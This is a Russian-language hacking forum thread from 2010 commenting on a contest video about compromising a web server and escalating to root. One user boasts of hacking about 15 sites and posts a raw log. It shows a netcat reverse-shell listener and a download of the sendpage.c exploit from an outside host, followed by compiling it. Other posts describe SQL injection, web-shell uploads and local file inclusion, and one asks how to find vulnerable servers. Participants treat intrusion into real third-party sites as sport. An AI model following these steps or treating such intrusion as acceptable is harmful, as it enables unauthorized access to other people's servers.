Взлом от 0 до root

Discussion in 'Видео-Конкурс [лето 2010]' started by [Dark Green], 18 Aug 2010.

  1. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Понравилось видео.
     
  2. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    52
    Likes Received:
    53
    Reputations:
    18
    Виртуоз))
     
  3. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    Очень сложный взлом, без пхп знаний не сломаешь, пока самый лучшее видео из 3 просмотренных:
    1. Dark Green (самое лучшее)
    2. NigthMare (средненькое, но понравились комментарии)
    3. Konqi (легкий взлом, достаточно найти скулю и через админку залить шелл)

    Все видео понравились, способом Конки попробывал и хочу заметить что его способ может повторить даже новичек, в отличии от способов взлома других участников

    Всем Мир

    ZiGZaG
     
  4. [none]

    [none] Banned

    Joined:
    22 Nov 2009
    Messages:
    83
    Likes Received:
    26
    Reputations:
    -6
    Найт ты в следущий раз, вообще ничо не снимай, ток каментируй..
    И все будут писать, что им всё понравилось....
     
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    понравилось, имхо лучшее видео
    забыл сменить владельца .htaccess`a :)
     
    2 people like this.
  6. [Dark Green]

    [Dark Green] Banned

    Joined:
    13 May 2010
    Messages:
    188
    Likes Received:
    430
    Reputations:
    567
    точняк :( :( :(

    По просьбе пользователей - обновил первый пост, заменил линк на архив с сорцами, сам скачал, теперь все точно гуд(хотя и раньше у меня норм качалось/открывалось), качайте, смотрите, учите, развивайтесь :cool:
     
  7. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Молодец! Больше нет слов!
     
  8. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    Cпасибо за видео
     
  9. ZnikiR

    ZnikiR Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    21
    Reputations:
    -5
    А как называется программа которой ты видео снимал?
     
  10. aim

    aim Historic Person

    Joined:
    1 May 2009
    Messages:
    742
    Likes Received:
    829
    Reputations:
    107
    глазки протри)
    первый пост
     
    #30 aim, 25 Aug 2010
    Last edited: 25 Aug 2010
    6 people like this.
  11. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Уже нахекал штук 15 сайтов. Везде одно и тоже блин =\

    Code:
    root@vz7075:~# nc -w 30 -l -p 4444
    sh: no job control in this shell
    sh-3.1$ cd /tmp/
    sh-3.1$
    
    sh-3.1$ sh-3.1$ wget http://****.narod.ru/sendpage.c
    --16:16:03--  http://****.narod.ru/sendpage.c
               => `sendpage.c'
    Resolving ****.narod.ru... 213.***.199.46
    Connecting to ****.narod.ru|213.***.199.46|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 5,992 (5.9K) [application/octet-stream]
    
        0K .....                                                 100%   52.51 KB/s
    
    16:16:03 (52.51 KB/s) - `sendpage.c' saved [5992/5992]
    
    sh-3.1$ gcc sendpage.c -Wall -o sendpage
    sh-3.1$ chmod -x sendpage
    sh-3.1$ ./sendpage
    sh: ./sendpage: Permission denied
    
    :( :( :(
     
  12. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    лоле
    Code:
    sh-3.1$ chmod -x sendpage
    
    вот зачем это? на крайняк chmod +x sendpage
    Мб харе тупо повторять увиденное где-то, а попробовать думать самому? =\
     
  13. Lynatik

    Lynatik Member

    Joined:
    26 Aug 2010
    Messages:
    0
    Likes Received:
    6
    Reputations:
    5
    Прикольный видос =)
    Лучший из всех тут по-моему. Имхо правильная идея - показать все от поиска уязвимости и до рута =)

    2DCrypt командой "chmod -x sendpage" ты убираешь права на выполнение, а надо наоборот "chmod +x sendpage"

    Кстати в большинстве случаев после компилирования права автоматически выставляются на выполнение =)
     
  14. Like-Angel

    Like-Angel New Member

    Joined:
    30 Jan 2010
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    парни вот у меня такой вопрос как в google искать такие сервера ? плз Help
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    качай программу "CriackerInterneta" и она сама всё найдёт
     
  16. ratripper

    ratripper New Member

    Joined:
    26 Sep 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    В видео упоминается сканнер файлов.

    Какой сканнер вы бы могли порекомендовать для использования?
     
  17. ShERIFF

    ShERIFF Banned

    Joined:
    18 Oct 2010
    Messages:
    87
    Likes Received:
    1
    Reputations:
    -2
    Вроде был(puTTy)
     
  18. MEMPHIS

    MEMPHIS Banned

    Joined:
    10 Mar 2007
    Messages:
    0
    Likes Received:
    8
    Reputations:
    0
    Пооолнейшая туфта. И что ты получил доступ к каким то левым сайтам. Вот раньше были взломы известных крупных серверов. А сейчас такое фигня c локальным инклудом школоту только восхищает. Локальный инклюд этоже старо как мир. Руууууууууусь встань с колен!!!
     
    #38 MEMPHIS, 22 Oct 2010
    Last edited: 22 Oct 2010
  19. [Dark Green]

    [Dark Green] Banned

    Joined:
    13 May 2010
    Messages:
    188
    Likes Received:
    430
    Reputations:
    567
    Ну так покажи мастерство ;) Моя задача была, показать полный путь, от поиска уязвимости, до ее применения и рутания сервера, на что ты и подавно не способен. Так что, считаю, твой коммент неуместен. =\

    Велком во второй конкурс, там и покажешь свой уровень. Поднять страну с колен может только лидер и образованный человек, дерзай ...
     
    4 people like this.
  20. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Да тьма таких видео..что с хакера..что тут..хотя отсюда в хакер обычно шлют..боян вообщем
    Вот демонстрация раскрутки например нестандартными методами уязвимости..новых ветвей..обход каких то замороченных фильтров IDS..и т.д..это показалаось бы интересным.
     
    #40 DimOnOID, 24 Oct 2010
    Last edited: 8 Nov 2010
    2 people like this.